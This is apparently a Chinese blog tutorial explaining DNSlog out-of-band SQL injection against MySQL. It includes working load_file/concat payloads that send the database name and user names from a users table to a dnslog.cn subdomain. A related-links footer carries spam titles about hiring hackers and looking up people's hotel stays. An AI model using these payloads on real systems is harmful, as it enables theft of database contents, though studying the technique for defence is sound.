DNSlog注入详细解析
DNSlog注入语句
select load_file(concat('\\\\',(select database()),'.gitw7c.dnslog.cn/abc'));//转换之后的结果为:\\security.gitw7c.dnslog.cn
原理是load_file通过请求security.gitw7c.dnslog.cn下的/abc文件时留下dns解析记录来获取信息的。
域名知识:
域名可以分为5级,从右向左解析,用 . 分割级别,低级别的域名要在高级别的域名中去解析,所以当security.gitw7c.dnslog.cn去gitw7c.dnslog.cn中去解析的时候,就会留下解析记录,通过获取前来解析的低级域名前缀来获取我们需要的信息
由于每一级域名的长度只能为63个字符,所以在mysql中获取到超过63个字节的字符时,会被当作一个错误的域名,不会产生去解析的动作,所以gitw7c.dnslog.cn也不会收到解析的记录,所以我们就获取不到想要的信息了
域名里有一个规则,只能出现数字,字母,下划线;所以在获取到的信息中包含了其他特殊符号时,load_file就会认为是一个错误的域名,就不会去从 *** 中解析了。
如:
当前我的数据库名为security,是以字母开头的,在域名规则内是允许的,所以load_file会向域名进行解析
sql payload
当我在域名中拼接一个@符号时,就不会进行解析
也就不会有解析记录
我们在使用group_concat合并查询时,会自动使用 "," 连接我们查询到的每值,但是由于 , 在url中是不允许出现的,所以使用group查询到的值去解析时候,mysql就会认为这不是一个url地址,就不会出现解析的操作,所以就没法获取到值,
更佳方案
不过事情总是有解决的办法的,通过我不断地构造语句,之后使用replace,substr等函数,成功绕过了url解析的问题
如:
select load_file(concat('\\\\',(select SUBSTR(replace((group_concat(username )),',','_'),1,63) from users),'.qnpqsu.dnslog.cn/abc'))通过正则替换将replace中的 “ ,”全部替换为 “ _ ” 这样就可以符合url的解析规则了,并且我们只需要将查询结果的字符长度控制在63个就可以了.
如图:
作者:GoodXuan ? ·
学校:必安科技-必火 *** 安全? ? ? ? ? ? ? ? ? ? ? ?·
E-mail:2596456807@qq.com? ·
如若转载请在文章中表明原文章出处与作者? ·
相关文章
拉布拉多狗的训练有什么方法(如何正确训练拉
导盲犬的来源绝大多数为导盲犬学校出生,有优良血统的拉布拉多,这并非虚荣喔,而是因为他们是工作犬,为人类安全及训练成本考量,必须很清楚其祖宗八代不能有攻击人类的记录,并且无任何遗传疾病&hell...
怎样才能赚钱最快最靠谱(10个空手赚钱最快的方法)
赚钱最快的要领如下: 1、复制别人的项目赚钱。 一种手机充值卡买100元送100元的,打电话很自制,但只能打电话,不能发短信。很是吸引消费者。每张卡可以赚8元,1个小时能卖30张,假如帮他卖,每张只需...
能调查个人信息的公司_1元微信号自助出售
最近头条哥看《欢乐颂2》中毒已深 早在《欢乐颂1》播出的时候 相信大家就已经被 “要不要一起回家,回无锡”刷屏 原来关关是咱们无锡的毛乌头啊 其中让头条哥印象深刻的有这样一个情节 在《欢乐颂2...
能找黑客无卡转钱吗-黑客的代号都是怎么取的
能找黑客无卡转钱吗相关问题 黑客的代号都是怎么取的相关问题 如何寻找黑客微信号 黑客电话号码资源(黑客手机号码定位)...
全国宾馆入住查询系统怎么查老公或老婆和谁在开宾馆! ...
对regedit.exe大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL...
拼多多市值超京东是真的吗 拼多多市值超京东怎么回事
拼多多美股周四收盘暴涨12.62%,报39.38美元创历史新高。其市值单日增长51亿美元,达到464.71亿美元,超过京东成为中国第四大互联网公司,仅次于阿里巴巴(4492.39亿美元)、腾讯(388...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!